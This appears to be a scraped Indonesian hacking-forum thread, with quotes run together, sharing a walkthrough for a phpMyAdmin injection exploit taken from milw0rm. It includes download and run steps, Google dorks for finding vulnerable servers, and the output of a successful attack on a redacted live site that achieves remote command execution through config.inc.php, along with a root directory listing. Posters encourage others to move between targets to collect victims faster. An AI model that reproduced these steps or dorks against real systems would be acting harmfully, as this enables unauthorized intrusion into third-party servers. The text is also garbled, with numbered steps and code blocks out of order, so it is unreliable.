Moderators: Paman, Xshadow, indounderground, NeOS-01
agent_of_change wrote:ada dork nya ga?Xshadow wrote:
berarti tidak diperbolehkan masuk phpmyadmin secara langsung
harus lewat cpanel dulu...
try and error trus bro
cari target lain
jangan terpaku 1 target
biar cepet dapet korban
Code: Select all
inurl:phpmyadminHarus pake Linux ya.....3. kalo kamu pake linux kamu harus install curl caranya :Code:
sudo apt-get install curl
pakai lve cd juga bisa...justkid wrote:Harus pake Linux ya.....3. kalo kamu pake linux kamu harus install curl caranya :Code:
sudo apt-get install curl
isntal dulu dung
Bro.. gw masih agak bingung di no4.wishnusakti wrote:jumpa lagi nih... jangan bosen ya... disini aku mau kasih PoC phpMyAdmin injection code, dan udah berhasil sih hehehe
1. Download exploit nya di milw0rm2. setelah di download ubah permission file yang dengan cara :Code: Select all
http://milw0rm.com/exploits/download/89213. kalo kamu pake linux kamu harus install curl caranya :Code: Select all
chmod 755 nama_file.sh4. googling :Code: Select all
sudo apt-get install curl5. contoh nya :Code: Select all
inurl:phpmyadmindan hasilnya :Code: Select all
wishnu@stupid:~/Desktop$ ./myadmin.sh http://**********.****.**/ [+] checking if phpMyAdmin exists on URL provided ... [+] phpMyAdmin cookie and form token received successfully. Good! [+] attempting to inject phpinfo() ... [+] success! phpinfo() injected successfully! output saved on /tmp/myadmin.sh.25692.phpinfo.flag.html [+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.: http://*********.*****.**//config/config.inc.php?c=ls+-l+/ http://***************//config/config.inc.php?p=phpinfo(); please send any feedback/improvements for this script to unknown.pentester<AT_sign__here>gmail.comok dehhh sekian dulu yaCode: Select all
total 112 drwxr-xr-x 2 root root 4096 Mar 11 06:47 bin drwxr-xr-x 3 root root 4096 Apr 16 07:24 boot lrwxrwxrwx 1 root root 11 Feb 19 20:07 cdrom -> media/cdrom drwxr-xr-x 13 root root 13840 May 31 08:21 dev drwxr-xr-x 96 root root 4096 Jun 11 06:44 etc drwxr-xr-x 5 root root 4096 May 4 13:49 home lrwxrwxrwx 1 root root 32 Feb 20 07:00 initrd.img -> boot/initrd.img-2.6.27-11-server lrwxrwxrwx 1 root root 31 Feb 19 20:09 initrd.img.old -> boot/initrd.img-2.6.27-7-server drwxr-xr-x 13 root root 12288 Apr 16 07:23 lib drwx------ 2 root root 16384 Feb 19 20:07 lost+found drwxr-xr-x 3 root root 4096 Feb 19 20:07 media drwxr-xr-x 14 root root 4096 May 18 22:39 mnt drwxr-xr-x 2 root root 4096 Feb 19 20:08 opt dr-xr-xr-x 115 root root 0 May 31 08:21 proc drwxr-xr-x 9 root root 4096 May 19 14:47 root drwxr-xr-x 2 root root 4096 Apr 16 07:23 sbin -rw------- 1 root root 31903 Feb 19 23:34 sql1qPPmS drwxr-xr-x 2 root root 4096 Feb 19 20:08 srv drwxr-xr-x 12 root root 0 May 31 08:21 sys drwxrwxrwt 5 root root 4096 Jun 14 05:32 tmp drwxr-xr-x 11 root root 4096 Feb 19 20:14 usr drwxr-xr-x 15 root root 4096 Feb 19 20:26 var lrwxrwxrwx 1 root root 29 Feb 20 07:00 vmlinuz -> boot/vmlinuz-2.6.27-11-server lrwxrwxrwx 1 root root 28 Feb 19 20:09 vmlinuz.old -> boot/vmlinuz-2.6.27-7-server
thanks to: inc0mp13te, xshadow, mywisdom, cybermutaqin dan lain lain
salam PsyChotr0n
Code: Select all
inurl:phpmyadminCode: Select all
inurl:"querywindow.php"
inurl:"/xampp/phpinfo.php"
inurl:"import.php"
hueuhe,,,Santet wrote:iya disini terdeksi av nya linux apa geto
tpi kompi saya buat kerja
dan ini bkn kompi sendiri
ada cara laen yang bwt windows gk??
please
Code: Select all
[+] could not grab form token. you might want to try exploiting the vuln manually :(
hehheh sip tambahin neh atu lg dork nagblack wrote:Dork diatas mungkin ga 100% akurat.. Tp selama itu bs memberikan target baru why not...Code: Select all
inurl:"querywindow.php" inurl:"/xampp/phpinfo.php" inurl:"import.php"
Code: Select all
inurl:xampp/lang.php?
Code: Select all
inurl:phpmyadmin/index.php
inurl:phpmyadmin/index.php joomla
